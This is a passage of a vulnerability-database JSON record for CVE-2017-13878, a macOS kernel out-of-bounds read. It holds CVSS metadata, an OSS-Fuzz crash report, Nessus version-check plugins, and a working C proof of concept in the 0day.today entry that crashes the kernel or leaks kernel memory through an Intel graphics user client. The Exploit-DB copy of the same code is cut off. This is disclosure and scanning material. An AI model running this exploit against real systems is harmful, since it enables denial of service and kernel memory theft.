It allows local users to bypass intended memory-read restrictions or cause a denial of service (out-of-bounds read and system crash).", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.1, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2017-12-25T21:29:00", "title": "CVE-2017-13878", "type": "cve", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 5.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 7.8, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13878"], "modified": "2018-01-22T02:29:00", "cpe": [], "id": "CVE-2017-13878", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13878", "cvss": {"score": 5.6, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:C"}, "cpe23": []}], "ossfuzz": [{"lastseen": "2020-04-04T15:06:16", "bulletinFamily": "software", "cvelist": [], "description": "Project:\nhttps://github.com/systemd/systemd.git\n\nDetailed report: https://oss-fuzz.com/testcase?key=5751069692395520\n\nProject: systemd\nFuzzer: libFuzzer_systemd_fuzz-link-parser\nFuzz target binary: fuzz-link-parser\nJob Type: libfuzzer_asan_systemd\nPlatform Id: linux\n\nCrash Type: Heap-use-after-free READ 8\nCrash Address: 0x603000000170\nCrash State:\n condition_free_list_type\n link_config_free\n link_load_one\n \nSanitizer: address (ASAN)\n\nRecommended 
Security Severity: High\n\nRegressed: https://oss-fuzz.com/revisions?job=libfuzzer_asan_systemd&range=201903210209:201903230207\n\nReproducer Testcase: https://oss-fuzz.com/download?testcase_id=5751069692395520\n\nIssue filed automatically.\n\nSee https://github.com/google/oss-fuzz/blob/master/docs/reproducing.md for instructions to reproduce this bug locally.\n\nThis bug is subject to a 90 day disclosure deadline. If 90 days elapse\nwithout an upstream patch, then the bug report will automatically\nbecome visible to the public.\n\nWhen you fix this bug, please\n * mention the fix revision(s).\n * state whether the bug was a short-lived regression or an old bug in any stable releases.\n * add any other useful information.\nThis information can help downstream consumers.\n\nIf you need to contact the OSS-Fuzz team with a question, concern, or any other feedback, please file an issue at https://github.com/google/oss-fuzz/issues.", "modified": "2019-04-24T15:30:46", "published": "2019-03-23T04:05:42", "id": "OSSFUZZ-13878", "href": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=13878", "type": "ossfuzz", "title": "systemd/fuzz-link-parser: Heap-use-after-free in condition_free_list_type", "cvss": {}}], "nessus": [{"lastseen": "2020-09-23T18:28:42", "description": "This update for tiff fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2018-18661: Fixed NULL pointer dereference in the function\nLZWDecode in the file tif_lzw.c (bsc#1113672).\n\nCVE-2018-12900: Fixed heap-based buffer overflow in the\ncpSeparateBufToContigBuf (bsc#1099257).\n\nCVE-2017-9147: Fixed invalid read in the _TIFFVGetField function in\ntif_dir.c, that allowed remote attackers to cause a DoS via acrafted\nTIFF file (bsc#1040322).\n\nCVE-2017-9117: Fixed BMP images processing that was verified without\nbiWidth and biHeight values (bsc#1040080).\n\nCVE-2017-17942: Fixed issue in the function PackBitsEncode that could\nhave led to a heap overflow and caused a DoS 
(bsc#1074186).\n\nCVE-2016-9273: Fixed heap-based buffer overflow issue (bsc#1010163).\n\nCVE-2016-5319: Fixed heap-based buffer overflow in PackBitsEncode\n(bsc#983440).\n\nCVE-2016-3621: Fixed out-of-bounds read in the bmp2tiff tool (lzw\npacking) (bsc#974448).\n\nCVE-2016-3620: Fixed out-of-bounds read in the bmp2tiff tool (zip\npacking) (bsc#974447)\n\nCVE-2016-3619: Fixed out-of-bounds read in the bmp2tiff tool (none\npacking) (bsc#974446)\n\nCVE-2015-8870: Fixed integer overflow in tools/bmp2tiff.c that allowed\nremote attackers to causea DOS (bsc#1014461).\n\nNon-security issues fixed: asan_build: build ASAN included\n\ndebug_build: build more suitable for debugging\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-26T00:00:00", "title": "SUSE SLES11 Security Update : tiff (SUSE-SU-2018:3879-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5319", "CVE-2016-3619", "CVE-2016-3621", "CVE-2017-9117", "CVE-2016-3620", "CVE-2015-8870", "CVE-2018-18661", "CVE-2018-12900", "CVE-2016-9273", "CVE-2017-9147", "CVE-2017-17942"], "modified": "2018-11-26T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libtiff3", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:tiff"], "id": "SUSE_SU-2018-3879-1.NASL", "href": "https://www.tenable.com/plugins/nessus/119143", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:3879-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119143);\n script_version(\"1.4\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/22\");\n\n script_cve_id(\"CVE-2015-8870\", \"CVE-2016-3619\", \"CVE-2016-3620\", \"CVE-2016-3621\", \"CVE-2016-5319\", \"CVE-2016-9273\", \"CVE-2017-17942\", \"CVE-2017-9117\", \"CVE-2017-9147\", \"CVE-2018-12900\", \"CVE-2018-18661\");\n\n script_name(english:\"SUSE SLES11 Security Update : tiff (SUSE-SU-2018:3879-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for tiff fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2018-18661: Fixed NULL pointer dereference in the function\nLZWDecode in the file tif_lzw.c (bsc#1113672).\n\nCVE-2018-12900: Fixed heap-based buffer overflow in the\ncpSeparateBufToContigBuf (bsc#1099257).\n\nCVE-2017-9147: Fixed invalid read in the _TIFFVGetField function in\ntif_dir.c, that allowed remote attackers to cause a DoS via acrafted\nTIFF file (bsc#1040322).\n\nCVE-2017-9117: Fixed BMP images processing that was verified without\nbiWidth and biHeight values (bsc#1040080).\n\nCVE-2017-17942: Fixed issue in the function PackBitsEncode that could\nhave led to a heap overflow and caused a DoS (bsc#1074186).\n\nCVE-2016-9273: Fixed heap-based buffer overflow issue (bsc#1010163).\n\nCVE-2016-5319: Fixed heap-based buffer overflow in PackBitsEncode\n(bsc#983440).\n\nCVE-2016-3621: Fixed out-of-bounds read in the bmp2tiff tool (lzw\npacking) (bsc#974448).\n\nCVE-2016-3620: Fixed out-of-bounds read in the bmp2tiff tool (zip\npacking) (bsc#974447)\n\nCVE-2016-3619: Fixed out-of-bounds read in the bmp2tiff tool (none\npacking) (bsc#974446)\n\nCVE-2015-8870: Fixed integer overflow in tools/bmp2tiff.c that allowed\nremote attackers to causea DOS (bsc#1014461).\n\nNon-security issues fixed: asan_build: build ASAN 
included\n\ndebug_build: build more suitable for debugging\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1010163\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1014461\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1040080\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1040322\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1074186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1099257\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1113672\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=974446\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=974447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=974448\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=983440\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8870/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3619/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3620/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://www.suse.com/security/cve/CVE-2016-3621/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5319/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9273/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-17942/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9117/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9147/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-12900/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-18661/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20183879-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e798c7ce\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4:zypper in -t\npatch sdksp4-tiff-13878=1\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-tiff-13878=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-tiff-13878=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtiff3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:tiff\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"libtiff3-32bit-3.8.2-141.169.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"libtiff3-32bit-3.8.2-141.169.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libtiff3-3.8.2-141.169.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"tiff-3.8.2-141.169.22.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tiff\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:20:26", "description": "The remote host is running a version of Mac OS X that is 10.13.x\nprior to 10.13.2. 
It is, therefore, affected by multiple\nvulnerabilities in the following components :\n\n - apache\n - curl\n - Directory Utility\n - IOAcceleratorFamily\n - IOKit\n - Intel Graphics Driver\n - Kernel\n - Mail\n - Mail Drafts\n - OpenSSL\n - Screen Sharing Server\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.", "edition": 31, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-12-07T00:00:00", "title": "macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798", "CVE-2017-13869", "CVE-2017-5754", "CVE-2017-13887", "CVE-2017-7155", "CVE-2017-13871", "CVE-2017-7151", "CVE-2017-13865", "CVE-2017-13860", "CVE-2017-7158", "CVE-2017-13892", "CVE-2017-3735", "CVE-2017-7172", "CVE-2017-13858", "CVE-2017-13886", "CVE-2017-13904", "CVE-2017-13878", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-1000254", "CVE-2017-7159", "CVE-2017-13911", "CVE-2017-15422", "CVE-2017-13868", "CVE-2017-13847", "CVE-2017-13867", "CVE-2017-7163", "CVE-2017-7173", "CVE-2017-13872", "CVE-2017-13883", "CVE-2017-7154", "CVE-2017-13905", "CVE-2017-13848", "CVE-2017-13862", "CVE-2017-13875"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:apple:macos", "cpe:/o:apple:mac_os_x"], "id": "MACOS_10_13_2.NASL", "href": "https://www.tenable.com/plugins/nessus/105080", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105080);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/06/19 15:17:43\");\n\n script_cve_id(\n \"CVE-2017-1000254\",\n \"CVE-2017-13847\",\n \"CVE-2017-13848\",\n \"CVE-2017-13855\",\n \"CVE-2017-13858\",\n \"CVE-2017-13860\",\n \"CVE-2017-13862\",\n \"CVE-2017-13865\",\n \"CVE-2017-13867\",\n \"CVE-2017-13868\",\n \"CVE-2017-13869\",\n \"CVE-2017-13871\",\n \"CVE-2017-13872\",\n \"CVE-2017-13875\",\n 
\"CVE-2017-13876\",\n \"CVE-2017-13878\",\n \"CVE-2017-13883\",\n \"CVE-2017-13886\",\n \"CVE-2017-13887\",\n \"CVE-2017-13892\",\n \"CVE-2017-13904\",\n \"CVE-2017-13905\",\n \"CVE-2017-13911\",\n \"CVE-2017-15422\",\n \"CVE-2017-3735\",\n \"CVE-2017-5754\",\n \"CVE-2017-7151\",\n \"CVE-2017-7154\",\n \"CVE-2017-7155\",\n \"CVE-2017-7158\",\n \"CVE-2017-7159\",\n \"CVE-2017-7162\",\n \"CVE-2017-7163\",\n \"CVE-2017-7171\",\n \"CVE-2017-7172\",\n \"CVE-2017-7173\",\n \"CVE-2017-9798\"\n );\n script_bugtraq_id(\n 100515,\n 100872,\n 101115,\n 101981,\n 102097,\n 102098,\n 102099,\n 102100,\n 102378,\n 103134,\n 103135\n );\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n\n script_name(english:\"macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown)\");\n script_summary(english:\"Checks the version of Mac OS X / macOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes multiple security\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X that is 10.13.x\nprior to 10.13.2. 
It is, therefore, affected by multiple\nvulnerabilities in the following components :\n\n - apache\n - curl\n - Directory Utility\n - IOAcceleratorFamily\n - IOKit\n - Intel Graphics Driver\n - Kernel\n - Mail\n - Mail Drafts\n - OpenSSL\n - Screen Sharing Server\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208331\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208394\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS version 10.13.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7172\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", 
value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\nmatches = pregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (empty_or_null(matches)) exit(1, \"Failed to parse the macOS / Mac OS X version ('\" + os + \"').\");\n\nversion = matches[1];\nfixed_version = \"10.13.2\";\n\nif (version !~\"^10\\.13($|[^0-9])\")\n audit(AUDIT_OS_NOT, \"macOS 10.13.x\");\n\nif (ver_compare(ver:version, fix:'10.13.2', strict:FALSE) == -1)\n{\n security_report_v4(\n port:0,\n severity:SECURITY_HOLE,\n extra:\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n'\n );\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"macOS / Mac OS X\", version);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-03-19T11:05:16", "description": "Exploit for macOS platform in category dos / poc", "edition": 1, "published": "2018-01-19T00:00:00", "type": "zdt", "title": "macOS 10.13 (17A365) - Kernel Memory Disclosure due to Lack of Bounds Checking in AppleIntelCapriCon", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-13878"], "modified": "2018-01-19T00:00:00", "href": 
"https://0day.today/exploit/description/29581", "id": "1337DAY-ID-29581", "sourceData": "/*\r\nAppleIntelCapriController::getDisplayPipeCapability reads an attacker-controlled dword value from a userclient structure\r\ninput buffer which it uses to index a small array of pointers to memory to copy back to userspace.\r\n \r\nThere is no bounds checking on the attacker supplied value allowing (with some heap grooming) the disclosure of arbitrary\r\nkernel memory:\r\n \r\n__text:000000000002ACE0 mov eax, [rbx] ; structure input buffer\r\n__text:000000000002ACE2 mov rsi, [rdi+rax*8+0E48h] ; rax is controlled -> rsi read OOB\r\n__text:000000000002ACEA cmp byte ptr [rsi+1DCh], 0 ; as long as this byte isn't NULL\r\n__text:000000000002ACF1 jz short loc_2AD10\r\n__text:000000000002ACF3 add rsi, 1E11h ; void * ; add this offset\r\n__text:000000000002ACFA mov edx, 1D8h ; size_t\r\n__text:000000000002ACFF mov rdi, r14 ; void *\r\n__text:000000000002AD02 call _memcpy ; copy to structure output buffer, will be returned to userspace\r\n \r\nTested on MacOS 10.13 (17A365) on MacBookAir5,2\r\n*/\r\n \r\n// ianbeer\r\n// build: clang -o capri_display_pipe capri_display_pipe.c -framework IOKit\r\n \r\n#if 0\r\nMacOS kernel memory disclosure due to lack of bounds checking in AppleIntelCapriController::getDisplayPipeCapability\r\n \r\nAppleIntelCapriController::getDisplayPipeCapability reads an attacker-controlled dword value from a userclient structure\r\ninput buffer which it uses to index a small array of pointers to memory to copy back to userspace.\r\n \r\nThere is no bounds checking on the attacker supplied value allowing (with some heap grooming) the disclosure of arbitrary\r\nkernel memory:\r\n \r\n__text:000000000002ACE0 mov eax, [rbx] ; structure input buffer\r\n__text:000000000002ACE2 mov rsi, [rdi+rax*8+0E48h] ; rax is controlled -> rsi read OOB\r\n__text:000000000002ACEA cmp byte ptr [rsi+1DCh], 0 ; as long as this byte isn't NULL\r\n__text:000000000002ACF1 jz short 
loc_2AD10\r\n__text:000000000002ACF3 add rsi, 1E11h ; void * ; add this offset\r\n__text:000000000002ACFA mov edx, 1D8h ; size_t\r\n__text:000000000002ACFF mov rdi, r14 ; void *\r\n__text:000000000002AD02 call _memcpy ; copy to structure output buffer, will be returned to userspace\r\n \r\nTested on MacOS 10.13 (17A365) on MacBookAir5,2\r\n#endif\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n \r\n#include <IOKit/IOKitLib.h>\r\n \r\nint main(int argc, char** argv){\r\n kern_return_t err;\r\n \r\n io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(\"IntelFBClientControl\"));\r\n \r\n if (service == IO_OBJECT_NULL){\r\n printf(\"unable to find service\\n\");\r\n return 0;\r\n }\r\n \r\n io_connect_t conn = MACH_PORT_NULL;\r\n err = IOServiceOpen(service, mach_task_self(), 0, &conn);\r\n if (err != KERN_SUCCESS){\r\n printf(\"unable to get user client connection\\n\");\r\n return 0;\r\n }\r\n \r\n uint64_t inputScalar[16]; \r\n uint64_t inputScalarCnt = 0;\r\n \r\n char inputStruct[4096];\r\n size_t inputStructCnt = 8;\r\n *(uint64_t*)inputStruct = 0x12345678; // crash\r\n //*(uint64_t*)inputStruct = 0x37; // disclose kernel heap memory\r\n \r\n \r\n uint64_t outputScalar[16];\r\n uint32_t outputScalarCnt = 0;\r\n \r\n char outputStruct[4096];\r\n size_t outputStructCnt = 4096;\r\n \r\n err = IOConnectCallMethod(\r\n conn,\r\n 0x710,\r\n inputScalar,\r\n inputScalarCnt,\r\n inputStruct,\r\n inputStructCnt,\r\n outputScalar,\r\n &outputScalarCnt,\r\n outputStruct,\r\n &outputStructCnt); \r\n \r\n if (outputStructCnt > 20) {\r\n int n_leaked_ptrs = (outputStructCnt-7)/8;\r\n uint64_t* ptrs = (uint64_t*) (outputStruct+7);\r\n for (int i = 0; i < n_leaked_ptrs; i++) {\r\n printf(\"%016llx\\n\", ptrs[i]);\r\n }\r\n }\r\n return 0;\r\n}\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/29581", "cvss": {"score": 5.6, "vector": 
"AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2018-01-24T14:27:23", "description": "macOS 10.13 (17A365) - Kernel Memory Disclosure due to Lack of Bounds Checking in 'AppleIntelCapriController::getDisplayPipeCapability'. CVE-2017-13878. Dos ...", "published": "2018-01-19T00:00:00", "type": "exploitdb", "title": "macOS 10.13 (17A365) - Kernel Memory Disclosure due to Lack of Bounds Checking in 'AppleIntelCapriController::getDisplayPipeCapability'", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-13878"], "modified": "2018-01-19T00:00:00", "id": "EDB-ID:43780", "href": "https://www.exploit-db.com/exploits/43780/", "sourceData": "/*\r\nAppleIntelCapriController::getDisplayPipeCapability reads an attacker-controlled dword value from a userclient structure\r\ninput buffer which it uses to index a small array of pointers to memory to copy back to userspace.\r\n\r\nThere is no bounds checking on the attacker supplied value allowing (with some heap grooming) the disclosure of arbitrary\r\nkernel memory:\r\n\r\n__text:000000000002ACE0 mov eax, [rbx] ; structure input buffer\r\n__text:000000000002ACE2 mov rsi, [rdi+rax*8+0E48h] ; rax is controlled -> rsi read OOB\r\n__text:000000000002ACEA cmp byte ptr [rsi+1DCh], 0 ; as long as this byte isn't NULL\r\n__text:000000000002ACF1 jz short loc_2AD10\r\n__text:000000000002ACF3 add rsi, 1E11h ; void * ; add this offset\r\n__text:000000000002ACFA mov edx, 1D8h ; size_t\r\n__text:000000000002ACFF mov rdi, r14 ; void *\r\n__text:000000000002AD02 call _memcpy ; copy to structure output buffer, will be returned to userspace\r\n\r\nTested on MacOS 10.13 (17A365) on MacBookAir5,2\r\n*/\r\n\r\n// ianbeer\r\n// build: clang -o capri_display_pipe capri_display_pipe.c -framework IOKit\r\n\r\n#if 0\r\nMacOS kernel memory disclosure due to lack of bounds checking in AppleIntelCapriController::getDisplayPipeCapability\r\n\r\nAppleIntelCapriController::getDisplayPipeCapability reads an 
